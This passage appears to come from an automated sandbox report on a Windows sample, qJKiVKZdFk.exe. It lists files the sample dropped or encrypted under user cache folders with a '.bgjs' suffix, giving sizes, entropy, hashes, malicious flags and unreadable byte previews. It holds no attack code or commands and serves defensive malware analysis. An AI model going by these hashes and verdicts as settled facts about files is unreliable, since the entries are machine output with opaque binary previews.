                                                                                                                                      Preview:.w.. ^.3I..!.FO......<...wr......W.T>e..;.tS.........QE..p....2}.].^3$.u..6.&....:..o...~.l.tKn...z.B.).(W.....i&tTI..$...i..G.a&.5.R14..{.[.MJ...{%X....@ .+..^jbT...8A2....JboX..r'......WQ...{....._2.[..{..hv....k..-.+....w...<..... $..>....g...%..a+......:.W.}.'......zZ..........h...lq.q8..Q.R......l.....;|.4.)...?..?.m..._....#.._a._.......%R _...7p.8N@......... ..B.1.NE..H..6.:g6..2..........vAJ..)~[$..A,..z..a..?..F/aB.|.~}G.>.....6~.~^.2.<A.`<+.8.5.x.51M..ls.#....m.q.\O:.^...~]..7R.!..$...Ye)<.:.&.....$..j.$Z....E;...hU.b...d..2.=.Rc\.7m2....'...s.fo.......[X.Q;....W...^.....Z.C......u).......MN.......,.E...A%..F .g.".,_.k....:A.X..f........p.Z..K...ST*.%?.....*...RC:.aE)..U..O.....e<S..L....o.....hUQ..'A.sE.\L^.a...v..2.YHK.W.`...2z_....F\H...p....g.\...A.s../e.&2.^...w.N_.>.I..E.W.5(.gjK.n..e.N....W.[...M.,...g..".7.c.O.=.O.#.X.1iv.....Y.;n........4u......M.OM.~;y...4..J-^.p.w.........@........N<......,..:p.'-X.".$.I.=.../YO4....

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):102918
                                                                                                                                      Entropy (8bit):7.998237354281132
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:9ZC9p/FHYfjPth6/eoByeb03XYq8KLleT9IBp+0:94vxYfjPD6zBK8KLcILx
                                                                                                                                      MD5:F5C16642A55CB34F27C6748FCD8B80C9
                                                                                                                                      SHA1:2ABE260AECEE0A68BC553B214457F46C66CC51C0
                                                                                                                                      SHA-256:7FC51AEC6F033656AAA602E8116F173AA4E5B44C63837932A2B8E6215E23AAAE
                                                                                                                                      SHA-512:C68B96FB62A6EF0CBF50A6D535161D41E9B4E4B3B67978005E4D61D8A68201B8945DED1B195F1A839C7D3B6BC1BCB112D0A86D1A95A8566FEF9494A2E5E5895E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:....h6...o....._..n......zzb.j;...)....W...t.h....@...& .......O..oH.,.H....r.5.e`z)8.G.......p...yR..H.kRi+....!.T.(6G..,R..$@.o.....x.N..>.vd...../...K..._/O.R.6J.........l.{>'.I.C.}.t..Ki.,.)j.....2...../._.*D..N...K\5...8eR.@..3......5d0..T...........C....[.>L..^....6..^i.|>..-}.zi`INU....9)...1 ...I...\.^......../T.%T......'N.8>..O.%P.A.#.2..-..2;w.-..!I.V..2.[......K...8..W.~ .;.......2.Nx.{.@d..qhk(:F.....{W......5FE.._..w^......y...,...<.#[..3.a.b...+d.e../..J.5..'|....3.............j(v...=y.ym..C%.P.$W.w..,.......<....I6....q91.U&.....u.m..5F..T.I.`..9"1XmK..;...D...c9@.)...<.9.t.9f......!...."..:5.8.`...ir....K._..i...>..E|FK;..M0....k./..q$..o........~.k.Q.Q....N....&..@.8$..?..35...&....B.@.B(~.b.O.i.J.@..34...|...I~.D...h]h...?8....~...!CK_.}s.H.?]..F~P5..w*&z.0cBBY.]..fL..K..Gl....#\.|LloX........v...(.._4.a$...;...S."....K..K.........nf.*.U/.%.....7...z....&ZW.. .C.~.........hy.'......X.....%..70t2......5h.L...W.2

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75502
                                                                                                                                      Entropy (8bit):7.9978803277010195
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:dxTin39IfkyJwMl55+4uWrS5+BveUHD4SVWolEYsQtMONl8RJ:dENJZMlDqWa+B2mVWeELQt/lU
                                                                                                                                      MD5:140FFD8BBA5A195867F9BBC1EDFDB5C3
                                                                                                                                      SHA1:391E0F0F5979D6FC454D8428DA654AC822406975
                                                                                                                                      SHA-256:FC5C649F376CC575EF2903C09562E7E348DA0A8C32DE94D4501B37B1236E3D6C
                                                                                                                                      SHA-512:72DF95E0F2353BDCBB714EC63201E14E32056E484642C30A43E7EA67276E00A728515FA2D34F563B1D10812F9C50AD97CA85388568DB6B88AF0E5488AAE602A2
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.....J.<.\...............5,".q......=...F4.H...6r..R...h.`&.CK....9.......~.8.G..yV..)....M....n.++E..".2d...$...p.C>.f....>x4.RM....?....B..i..@.B#.3...j. h.......+_^.........%.+.n..#.PK3~..;D..........y.,.B.....$..(g....?h....2im......0..<8..ey{...x.....d-[K.h....../..Z..2.ZT....%...........7v.9u.z.s..Z.X..<C.`[2.H.qy..F..#..=!!hK....f.1kFyi..NZ...........S...9...n..X}v$.5' A..aS.:\b.|.4!.....TU....[.Hd....Xw.H.(9~.......A....M....W.anL.P.].w!....q].QcC.T..D...*......'=Y.X....}F-.Q..a.1 ..lpn.w........8..%#.......z.Y..H.........`.N`...!..Z......`.k..=....PgV-........e...,....Xew......Q...".n\u.f.W....".^.2;I.e.#.4..t.$!.Z.P.8.....$.-_.1m.W....V......I...........b;d..z.5D.K.:.g.6.......2ur.....?.s......[nu.....l)..'{aEO8.Q).....S+x..*...K.T.H9&.. ...z.\Q..i.F.p....A........|..)..._%...s...H.+.T.@!p3.v....#....a...{,.....A5..j6.....W.vDk......x..Z....DAH...U3...........(......*5 .[.|r....].(.(.U0./...3.5...f.wV...h..k..[d

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):105422
                                                                                                                                      Entropy (8bit):7.9981987413215725
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:mXceLTHfH4ZcMU0wKlkjOHLdLt0H4RglDfWfwzXFSKFC:c3THv4Z3zwKWOHptsE+f0wxLFC
                                                                                                                                      MD5:831CFCFE72CF517617773A8C8504A0C5
                                                                                                                                      SHA1:006B1EA5156D7BF80FE5FAC34E69D9B56BB0C613
                                                                                                                                      SHA-256:37044475CD201F7733F4D7FE5DA815786592FCD36B4C2060FF1DAED3FFF72044
                                                                                                                                      SHA-512:AAFE7EC31E233D03159852E5D6B0104AD87C862D6DEE385C4C69DA9CDA73CA27AE411A75A9881BADD363B217F18D22CCC595459B5FDCC41B4C1E6B211D87D0BB
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.... ....8....flB...@.;.p..&.Y..oEJ.*.<.|Pv..A....::..hc9......A.;N.]..W..^.Nk..1;.:i6...$@Mp#.7...k.?..."d#...t..KoQ..^=.....AH......=Tr,.m.....6%...1<.um..*.....pi..Z....N....d..%.a.A.%....Bn..sr.v...`.q..=........qt.a.}p...7[.w..N..0.w.vB..t....ez#.....C.j.,Z....w..l........aH....J...i......7k...A...I.Aj...^...X1.ea.7..._.u...h4X...u.o.....U....^.S...}vuI...;..[...s..~L....@Ux..7r..b.L2+...E./Z..>.S.....}NZ..nU}....!..E"..A......-`...P.z..Y....m$9..6~8+..W/q.@.PWG.....W.^...)/.O$.g.V.)..w.P.i...pT.............g.].p....o...h!.~.....p.RJ.6..a.0.Q...,.....b..*.J....fF.1.+~..\T!.........(_.."!.......s.x.S_....d...P.k...&....k.7.z+.4=..9Co.C..HQ...p"..6)....7...wh...5..22.=..f.....K....CN.To.Q}l.~Q..J.B..p."v.-.....!d. .O.^......6p..."...F_.m....\e....!r....(...Z...Wa..Q.ps.n.![.........%D.Nr...+...g{..N..."...&<S.#.&0`.5.YW...@.9b..R...W.."...$a...ero;.K.*.z;.`?-.^8.u...<.P..K.2...U]v1.N.|R.\.C....$.x.$1.,.1......5@=..r,pa...j.i.....aQU..

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog.etl.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):639310
                                                                                                                                      Entropy (8bit):5.732545571902894
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:74660zWAHjx0AxcNdbanlWIYH8PxH6sZW/h3E+NM:H6MWA2A2MEIRHcJ3EgM
                                                                                                                                      MD5:950588F52CABE6730847A424A6EEADAA
                                                                                                                                      SHA1:14B977AB2398AB4ECACEA789DA4C4E0CD114C35B
                                                                                                                                      SHA-256:5B8727ECBC300465C15A55CB7F278D4E48F6B9A42EB99C7D0CA7CADD5FDDD99E
                                                                                                                                      SHA-512:B9ABAC676DEA6DC6F69A52A86EE8D4F69BA450958C124EC7E8F2B4306EC5323A7A73747238E3A25482BDB52763232631C3D67BF52B94BFDA23FFDC9A92B12D8D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:. ...\...Fy...{........B...X!...v`>G.6.. ......h[.8.>.K%...u..........6.)A4.....g.N......~....b.#..{S.... #.D2gA.*.~...J.....Qm.![........#...2...<mEO.....1R7Wo.*....#...R....@...[.....jJr..\ ..6.2.+<2....A.v .j4.+;N.'...\..b..r_............H....5n-.g|{.&...|...F.H.Z.0..?.>wt.UO......fR8..F}K..9)..a..(>...{.b..z.."......lZ..%..7*.f..b.ka.@...W.p..)....&5...}0U...h.....q........0... d..l.M...:w4.>&...(.K._;|.:...u.....>.....Jhy....x..(.u......t.......~..q.<I&......#r..#.w....@._...B...........zF..'.aE.!... .a...O..`....&..p...w.H2]s.i.\1..">..c..tJWV.<..gk..&..A$.hB%.T.....gy...qn....0.,........X9.Y .?.....b..).....%.....2.N.0..n.7......[......`9....e...,GR.h.'.Do...~i....9>?..{yX...A3.z.u.Ts=.!.:a)=B..4.D...G.d..a....t.k)vF51...~qp.."...,[kH.+....T....H...BG..q.p.a.;$.f..w+Q%R.'.RlO6......H:"..9....f.w[.....)...Q..3t..5.*&.."...<....Vk$.]HE|H.o.hl.}m..M..R...>.i....p{eP...{A...6.Z.%.w69;..u...H..@.........B9D...d/....)Bg..)#.5J|g

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.9923991793380225
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:epZmx7DfRTeXY1BN4YPbIvB3OkMt2z/JsJANsBqvrlJvmacQxVp2ma:eMRaoHbIFObtkJsJuTlJuacQB2ma
                                                                                                                                      MD5:D06BF0C9CA9EC88BFCEACE385D69D96B
                                                                                                                                      SHA1:11A389BA3C5CF24907F2528F21C4FF1289E5BF83
                                                                                                                                      SHA-256:6E147AADE9C389C515EEDB646A969B061E7C2778D15A54EC805B75D11AC51239
                                                                                                                                      SHA-512:76DD817F471D0C5BAAD7B77B43BEF908FC8C0FB3B7624A99ED0A91D1C018E28C9856D5FB081E2FCA1411FEA62CC1DB203C627BAACB1371B08EEEC1918AD5CFFA
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:. ....V.TGL."C_........xaZ...O.!.=......._%...[....n.`d.I..#..J...!}zG.}.M...St.=.+X.p=.K.b......J.K;b`.,."'..vb..96.....#.....q....>$QC.......i..8.Ri.....a,sL.s.......G.N.b.P.e...L...y........=L...k.....f..X.(.i.;... ..{).u.f8.{a......)......C...>+T.s.+!f~..J..V..b....~..,.$JR.........z..f......{..Q...xj..6.+.(..R.[....!..~..#..%P.je.....v.'q.M.....:...n..&U...).V.o6H.h.$...k.\.|v...m..%.`"...=Fp.h..o3.f...).............Vl(.rF..o..|.*|'..T.;.....".O.#E......<....%rG.[.0.........i2.<.|z..."B..4`......M.?......6..5w7S......h-@.....j.0..D..=~.G.XVY............~.LFL'......)D...Yx.l..$jI.._.L.0...T.<(......../.L.f={.$.j;..}vj..0..G.Q.r3'.*.gom\..b.fB.,....{..J.^......./.Q.....Q<.AT.n.xl........b\..qY.1.p.%I.Bq.3UR..ei....xy....R.{.^...Gi..l.J%..b.4*#j.A..z..&8D.......v...%g....~...6.q)...$YZ*.....3uQ...-.*p...u.`...c.f9~........'.......bw7.}.3..l......5xp....bNgK6...l5..d5....;P.z..i..D..~......j.G.....}....!\..uz.)Pr."7!.5o.G...g

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1280.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.228369646149024
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:SPxgdkqajx3QwE6m6MYzv1xeeXRvMKegNVRTlvV43ukIcii96Z:SWIMQRxxbviIRTlvVYukIcii9a
                                                                                                                                      MD5:0FCE5D2737E9D9D4F78C1C6546D691F9
                                                                                                                                      SHA1:D1EBADA5F9E42C55B6B89AFB4129BD5A75D6FA67
                                                                                                                                      SHA-256:BA1BD19EC1E3991AF89D302CA7C09454086DA75AAC95EEAD8C2A4DD9D63AD9DD
                                                                                                                                      SHA-512:C9F712749509C25764939CEC57543BC6FBCC4A418205172D143EA464091EDAE5E8CFE9A92A638E8FBB0867042A2F85808F02CDF217DDE1217FBAD800D0B67D4E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM y66..p.H.U.Q. ...i.p..^..3A...YK....F.n.9.....?.*G.d.Pn.yZ.;|.b....8PA.$..5.A...9@Y`..a..]..y....).W.......;.OX.%...=.^.......6DQ8...COD....t..h..#...X..#z}-n.A=.e,.6Tz...m.g.=..O....T.w......G/.e...DE.).2MV....S...V...)..J.K...J.1..3....|...,.X..N.s.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1920.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.150022712148512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:w6nFL3KON8zEY7XF+1Upkij01wCwXa7VlnSxstUsz3uYRVSlih5w33ukIcii96Z:LxaXzEY7XIQkijv47VlnCsmS3XbS3uk6
                                                                                                                                      MD5:8FEFCD59BBA3D3151E817B2896B47CA6
                                                                                                                                      SHA1:C64D15C27D173893B648F7F0DA1532F49673998F
                                                                                                                                      SHA-256:5AB9218A8E7FB6D041D82C12002830BA3644AB3FEF7D56ABBA90BFE54F738555
                                                                                                                                      SHA-512:5F654D5A898DC16EDA041B26F53CCD09C4004ED686F1D6923853B261FD6A3221F33B168F7FF7406D15172E305E04E336F283F8AB188F4C68254137AD3B794222
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .$b9......{...$......O.Eu.n.,rcq4).....w..*G..$.yO.&-UR.N.+4.H&..{<8~.6..2..t."..rN......t6...9.6.,...... ....k..F....$.rx,.K..(..^..=.7t.3..r.q.|j|....g=...o.RO....h.....M.....H...QY..1.C.sCV|.../-.(..H...{...w.H$k...,Nv;..j..u...D7O*..?"Z.f...}6....:H1~9tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_2560.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.242236790172329
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:GL1F+BfPqmBE1rAnSv9eWaq+K4QGFvUrUPe3r7oIzMi8VWck3ukIcii96Z:GLsPqmBSnvA008UP0Nv8GukIcii9a
                                                                                                                                      MD5:27341180ACA268B523DC529166813A8C
                                                                                                                                      SHA1:147C136719A78CF7A27E1E0C8E376C58E19331FA
                                                                                                                                      SHA-256:2ACE38907243024B6F35049DA7F4A23DF44A2AA6006DC975591F4BAA1979C720
                                                                                                                                      SHA-512:2102FE483DE87FD2EAD836DB05FCDE0095B5B5889D54F8B4DBD56B2ECFEC3AAD49AE0D674322285D8AFECF77C808CE3610816D35987A25BBA9B0A52827C38D2A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM `..&k....A.........!L...........47..X...vs.....>!....*...w).D9....i.u.T.r..OE..2.b.'.}..H>.z.d..B.4.f?D...[Lmit..o.N...q*yU......KVBq..U".Dpw. .1l.9Q...h_?...Z|...%~Gf.bo.I...... ...[..Qc........#<....4!..K...0A.1.O...$ ......Hk.V..p....$.E.D.p....Q.LW..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_768.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.302013579044555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:xgR1Zwjj8qqcMMW6C3TzN592q5yLHIXxaHs9tdYisL133ukIcii96Z:wA8qqcMvPuIXxAo+icRukIcii9a
                                                                                                                                      MD5:64FEF305103D7EBFFE6B12547FF45A0B
                                                                                                                                      SHA1:36E6A6552F9ECE551C3F4D44B78EC3F459DD038C
                                                                                                                                      SHA-256:39EE07C58909352A68BEB6F2207D876A0CE084DC61FF140E079F5E42813E3812
                                                                                                                                      SHA-512:FB97CC40CA0CADD6D82E84E59204828F282572DB005F92023FD55CC7FBB0D8DBC08C10E591B8A89088C9853A3F33BB07F2C6A354179A62278139ABD27103A89E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ..).?.!..c.U...F..|D.`L......u....sO....6.).[.."R..h.a^...m.7..'.d.p...\Q...........@.%Gs..h7.S....)..%...8....W.FeZ.b....g..:.-Y.5...%.........&M......T.GLt...j.>J.-r..+..H.|3.V...3U\V.....{...tO<..Bag.I....x....4...T.......1&...TG...e.^CB2.X.D...pn.....k..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_96.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.25013880532124
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:PXcFyn5vk58DxtTteWC/t9ENN9hb4G5lYchIP3ukIcii96Z:0ec5Sxh2l9EHv4G5lfhIPukIcii9a
                                                                                                                                      MD5:9679974D84B9A6564EE4675F740A0695
                                                                                                                                      SHA1:EA0AE05064F20C694EC2D3B059F25552918638F9
                                                                                                                                      SHA-256:825093AF409A6122D57CC5F516B7359ED1316F9CC75433CF06D2071A69253E58
                                                                                                                                      SHA-512:45967D5EC85293E20D9844B520E310608CC0D596853148C3CDCAA2FA3632D6634B2123FD9D11B8E329840B06BF500E08B6D71F8EB8F72DC2FF7997636892F1F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM 3..........mD.uD...x.$...'9..j.D..>=......#...O.^./...F....w..9...%by.g.....&5.tq.$8...5.6...A...l6...-,#M.`S...\...>.Z..G...N..).....Z..f\....#]...C...3.6.2.W....`z...P).`..1'R..uHu2-d4.G2...hBhFE. 9,.G...^..f!t...~........z...>.........E.......bg+..h.}.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_custom_stream.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.322081587550238
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:ULGL5P2bbDiz0BlyALmga7QkdZr3FvNKDO1yKPYOeHoJ03ukIcii96Z:ULGNP2b+0uq8HzBvN2OYKsHoJcukIciD
                                                                                                                                      MD5:2C5AD0D94847FEF6E2B38F5C587ADCCF
                                                                                                                                      SHA1:63EDC3EFD28F97D5484747F3A96EB279514D78FF
                                                                                                                                      SHA-256:B4F3A1225244D603B69AA23656F2D5CCC9E69D5F1B2E6870CA797628CF12C6EE
                                                                                                                                      SHA-512:2378EFF2CA8F5BB22F139A9CF44DC0A6867B1720661E39C8AB8FB32ADF03B7E676CAC79267CCC83A73B2B442BDD00E41EDD6D199670CBE6915B03C3E35C87E5E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM Y..........su.u...&.;.\..._.e..'.P....+U ...D.*;..RN.A.j......c....=.....o.PjY..<.{.{.'(... P...I.lU.wR1...:hu:f.&..>f_......m......p+(.,.....r.7....X.+..x.I.x.;dF'....@..a..:..._..w.......T.1.YY....D&j.....c].SF..U..(|.a's{...7...d.e.9.F*^..8_!.M01.....]w.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_exif.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.281840325101727
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YjDM52fmd/FqZRli/p51fOE5hcnf/fFcKuZLV/g7K4vceM1U+3ukIcii96Z:YY2fgdQI51frO/fFcKGVY9vcr1hukIcq
                                                                                                                                      MD5:3F2CE8D7E953E75260CDD6DFA39FB378
                                                                                                                                      SHA1:B6BE7318AC3427C995324AFC3C7BA23FB6AC8319
                                                                                                                                      SHA-256:F4C99B0C8D14327926C4D13331C557BF4A27F680C56A16406E37B994A3204E42
                                                                                                                                      SHA-512:19BFB2771855744BB38D17466C85BDF7F226EC6497CD680831598CC8242200DB8CC6C31D7E57377AD02B2DDBD10F61650D561F0F97886E33A5929ED18A724AA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .........,q..i\.V.9/..........[.3f.`...'y..X.1..T.$.....E>.1..j##.fsr...%...Cs.P.V.,....;}}.}D....>l"...[_.#a..s.}.&1.]W!\.a.._......O........2.M'.. .R...N.5......g...8..j.f..|...m..(.c}..d..........Zj...B.n..7r.J..<.>2?k...g..J.......p....G\V.}.*,+".4.yptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_sr.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.308294724506809
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:bCbYhw0EIPM9kXxHI3XuJxHjXZuOncJ16o1Xc8U33ukIcii96Z:yYq0xXxHQ+JxHjXZuOWsFnukIcii9a
                                                                                                                                      MD5:1D9EAFD00A1CDC9150B13B231CC7C26D
                                                                                                                                      SHA1:9524967BB613E905EB5E226AF4E7BE377A5C7D7A
                                                                                                                                      SHA-256:DA7D09D1DA5FFFDF99606EA3737F51F390C7798FA26AD421984611250848553E
                                                                                                                                      SHA-512:EE4FB6A5CE6156D38C10F779845570ACBC94D4B6B3FD69F13E7FEF76DDD4D121662E57088E28A5C18AB15280792772655B7C4671C12EB8D0160ED908D332667E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ....Y..vt.; ...\.a.....qM...U...`...D@.Z..%].?.T..B..4......S#rr.T4..(.c..6(v..j.6...(.\.......O.2.......H..bG..xl.;.P.u........%vl..T.7:..T.y.4..G.,.A..~...o. .s......&.:....t..Rd...9*f~......=b.(...U!..1.|...6<. j....M.....C..8r.2.^. ...I..>...3......z3..+).r.gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.308682896259373
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:yytm/9wkdUyp0XP3Mfjvp17i88g/UFvfDjniofZ32busUABPpXyH10v3ukIcii9a:yytm/9wWlafMF17iY/yDDjfZsr9piH2m
                                                                                                                                      MD5:2AB4C2E399FD8C10D888B71040CBEE90
                                                                                                                                      SHA1:7935FAB1D3D599721CF055BB7A70BDC9852ED241
                                                                                                                                      SHA-256:A0566D6FBF0A6A70B359A6928D45BFB16296B73FE89955B8D968DA4E79AA22C1
                                                                                                                                      SHA-512:B8CF78BA5322A31CDD8CD7CCB64D8335E961B27BA6EE7547C2DC8B254F86D139CB02E836402A10BA1704F614384ADA3D108FB52EE3AD3B19E1FA7C9692BEB33A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .f..c...u<EN..|.......<Vp.`..K...Z....\2.?..x.k...T)8n..1.M..p0...%.E..Z.D$.r..Q.Z.n.@..h. t..b.y.7..........&....\.C.....$....<....Ya....@.....s..MG.....1D...m\...%.S..]<.9.~...!......y.x..^-j.E5.D....s.....O..4..1\>.$.c.....J..(k(9.W#..........%...S....:..$..7tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.269297797180853
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pU12s/E7LZocfGq2QXOGorxbPYahbjTU2HPnEJO/F8XSHzCmiW9u3ukIcii96Z:W5kfGq2QXOnPPbUQ/4AF8E9+ukIcii9a
                                                                                                                                      MD5:C684AACBDF9F1E3455D06C4D03EC0288
                                                                                                                                      SHA1:3E699A82006150B6F4BA44932DDE7C0DD0F45B23
                                                                                                                                      SHA-256:E94A43E694C90A65992B9C86C7C62CA28D6AD3C4055A0BEC71C8527C153A8921
                                                                                                                                      SHA-512:5352950AF7EDA6E62354F0A7A6980EA8A412FCC7D2897B45A94D98AD2E147FB9ADB96C6E289E40B4A4353E92B79A85CA9615B98F606889DB15554DE2F2764325
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .Kkm..yh..g.4t...&.J..pH.........!.l..z...,L0x...G+.J"}...2.Rq...)....Z..H2.....Ms..VC..Z.".2.Pe...]...V...?...I.BY.<VRT......x..j@.e{....3.f..zuma2....i...z.h.t.++..B[.K.)....Q.....n.\Z......[h..gaQA.Qx...[.R#q.,.4R.2...g..i....I...0~'Om....sK..>.2.e...D.Y.[..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1280.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.284397639138251
                                                                                                                                      Encrypted:false
